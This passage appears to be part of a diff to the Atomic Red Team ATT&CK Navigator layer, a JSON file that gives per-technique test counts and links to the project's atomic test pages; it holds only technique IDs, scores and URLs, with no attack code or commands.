Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":30,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":117,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]}
\ No newline at end of file
+{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1001/T1001.md"}]},{"techniqueID":"T1001.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1001.002/T1001.002.md"}]},{"techniqueID":"T1003","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View 